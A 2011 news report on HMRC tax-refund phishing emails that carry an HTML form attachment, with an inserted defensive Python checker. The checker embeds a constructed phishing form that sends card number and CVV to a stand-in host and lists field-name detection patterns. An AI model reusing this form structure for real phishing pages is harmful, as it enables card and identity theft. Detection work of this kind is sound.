Apr 1, 2011 08:58 GMT

Security researchers from Belgian email security provider MX Lab warn about a new wave of HMRC tax refund phishing emails that is currently hitting people's email inboxes.

The rogue emails have forged headers to appear as originating from a [email protected] address and bear a subject of "Please Submit Your Payment Refund."

The tax refund theme is extremely common, not only with phishing emails spoofing the HMRC, but also with those targeting taxpayers in other countries.

There is, however, one particular aspect that sets this spam run apart. The emails discourage recipients from calling HMRC, even though verifying such claims by phone is something which both the tax agency and security researchers have advised for years.

In addition, unlike most phishing emails, which direct users to a rogue website, these ones have an HTML file attached to them.

"Due to the high volume of refunds due you must complete the online application, the telephone help line is unable to assist with this application. In oder to process your refund you will need to complete the application form attached to this email," the email's body reads.

The attachment is called Refund_Form.htm and displays an HMRC-branded page for inputting personal and credit card details. As also seen in other phishing scams, images displayed on the page are loaded directly from the legit hmrc.gov.uk domain.

After submitting the form, users are redirected to the real HMRC website in order to avoid raising suspicions. Meanwhile, the inputted information is sent to a Yahoo! email address.
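A mail gateway or analyst can test an HTML attachment for the pattern described above: fields asking for card details, images pulled from the real hmrc.gov.uk, and a form that submits somewhere else. The Python check below is an added example, not code from MX Lab or this article; the field-name hints, the sample markup and the collector.example host are constructed, and the mailto test is an assumption, since the article does not say how the data reaches the mailbox.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

SENSITIVE = ("card", "cvv", "expiry", "password", "account")  # assumed field-name hints

class AttachmentScan(HTMLParser):
    """Collects form targets, input names and remote image hosts."""
    def __init__(self):
        super().__init__()
        self.actions, self.inputs, self.img_hosts = [], [], set()

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.actions.append(a.get("action") or "")
        elif tag == "input":
            self.inputs.append((a.get("name") or "").lower())
        elif tag == "img":
            host = urlparse(a.get("src") or "").hostname
            if host:
                self.img_hosts.add(host.lower())

def registrable(host):
    # Crude last-three-labels cut, enough for *.gov.uk; use a public-suffix list in production.
    return ".".join(host.split(".")[-3:])

def findings(html):
    scan = AttachmentScan()
    scan.feed(html)
    out = []
    brands = {registrable(h) for h in scan.img_hosts}  # sites the page borrows its look from
    if any(any(s in n for s in SENSITIVE) for n in scan.inputs):
        out.append("collects-sensitive-fields")
    for action in scan.actions:
        u = urlparse(action)
        if u.scheme == "mailto":  # assumed delivery mechanism, not stated in the article
            out.append("form-posts-to-mail")
        elif u.hostname and brands and registrable(u.hostname.lower()) not in brands:
            out.append("form-target-differs-from-image-host")
    return out

# Constructed sample attachment: branded image from the real site, form posting elsewhere.
SAMPLE = """<html><body>
<img src="http://www.hmrc.gov.uk/images/logo.gif">
<form action="http://collector.example/submit" method="post">
<input name="fullname"><input name="cardnumber"><input name="cvv">
<input type="submit"></form></body></html>"""
```

Either finding on its own is weak; together, on an attachment to an unsolicited "refund" email, they match the behaviour MX Lab describes.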

Apparently, there is also a second, more traditional phishing campaign going around that uses fake HMRC tax refund notifications. However, this one uses links to an external site.

Despite these emails' recommendations to the contrary, users are strongly encouraged to verify all financial-related claims with the corresponding organizations over the phone.